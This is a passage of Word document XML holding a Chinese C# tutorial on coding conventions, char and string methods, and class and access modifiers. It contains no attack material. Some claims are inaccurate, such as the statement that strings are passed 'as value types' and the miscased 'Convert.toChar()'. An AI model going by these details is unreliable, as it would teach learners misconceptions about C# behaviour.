      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>对于if语句，使用“{}”把语句块包含起来</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>尽量不使用this关键字引用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命名规范</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用Pascal规则来命名方法和类型，pascal命名规则是第一个字母必须大写，并且后面的连接词第一个字母也要大写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有的成员变量前加前缀“_”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口名称加前缀“I”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有成员变量声明在类的顶端，用换行把他和其他方法分开</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用某个控件的值时，尽量命名局部变量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        <w:spacing w:before="376" w:beforeAutospacing="0" w:after="452" w:afterAutospacing="0" w:line="23" w:lineRule="atLeast"/>
        <w:ind w:firstLine="156" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b/>
          <w:color w:val="A52A2A"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
        </w:rPr>
        <w:t>C#字符与字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C#用char关键字表示一个字符，每个字符都有它对应的ASC码，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6367780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5701665" cy="4030980"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23" name="图片 1" descr="C:\Users\Administrator\Desktop\c2fdfc039245d688c56332adacc27d1ed21b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C:\Users\Administrator\Desktop\c2fdfc039245d688c56332adacc27d1ed21b2451.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5701436" cy="4030675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的方法有IsLower()判断字符是否是小写字母，IsUpper()是否为大写字母，IsNumber()是否为数字。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ToUpper()将字母转成大写，非字母返回原值，ToLower()将字母转成小写，非字母返回原值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将字符用int类型强制转换一下可得到ASC码，将一个int类型的数字对其调用Convert.toChar()即可转成char类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的ASC码有A(65)，a(97)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C#中String表示一个字符串，字符串是又字符数组组成的，它是引用类型；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>需要注意的是，它虽然是引用类型，但在当做参数传递时，是当做值类型传递的，传递的是值而不是地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说方法中对string参数的任何改变都不会影响到外面的string对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的方法有：</w:t>
      </w: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pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>方法名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>用法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pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Compare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>返回三值，第一个参数比第二个参数小返回-1，大返回1，相等返回0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pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Equals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>返回二值，两个字符串相等返回true，否则返回false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pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Concat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>返回传入字符串的连接值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pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用字符串替换占位符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pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Join</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="新宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>将一个集合转成字符串，在编写SQL语句时非常有用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>StringBuilder和String在拼接字符串时在性能上有很大差异</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C#常见类修饰符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="90" w:leftChars="0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>abstract抽象类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C#允许把类和方法声明为abstract。抽象类不能实例化，而抽象方法不能直接实现，必须在非抽象类的派生类中重写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sealed密封类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给类添加sealed修饰符，就不允许创建该类的子类。密封一个方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>示不能重写该方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>virtual虚方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 把一个基类方法声明为virtual，就可以在任何类的派生类中重写该方法。也可以将属性声明为virtual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>static静态类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态类无法被实例化，仅包含静态成员。Static修饰的成员，是属于类的，当这个类第一次加载时，该类下的所有静态成员会被加载，静态成员是唯一的，直到程序退出才会被回收。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>静态成员(属性，字段，方法等)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>静态成员属于类所有，它在内存中只占用一块区域，无论类创建了多少实例。而使用实例化会创建多个内存;静态方法效率上比实例高，缺点是不自动进行销毁，而实例化则可以做销毁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Override 重写方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C#要求在派生类的函数重写一个函数时，要使用override关键字显示声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="90" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>partial分部修饰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问修饰符（public、protected、internal 和 private ）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="16"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpXSpec="center" w:tblpY="312"/>
        <w:tblOverlap w:val="never"/>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exact"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840"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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>修饰符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>应用于</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FFFFFF"/>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2840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FFFFFF" w:sz="4"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FFFFFF" w:sz="4"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>类和类的成员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FFFFFF" w:sz="4"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>任何代码均可访问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28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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Protected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>类的成员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>只有派生的类型能访问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atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4F81BD" w:sz="8"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4F81BD" w:sz="8"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>类和类的成员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>只有包含在它的程序集中才能访问能访问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atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4F81BD" w:sz="8"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color="4F81BD" w:sz="8"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rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>类的成员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="4F81BD" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B8CCE4"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>可以在其他项目中被子类使用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28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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Private</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
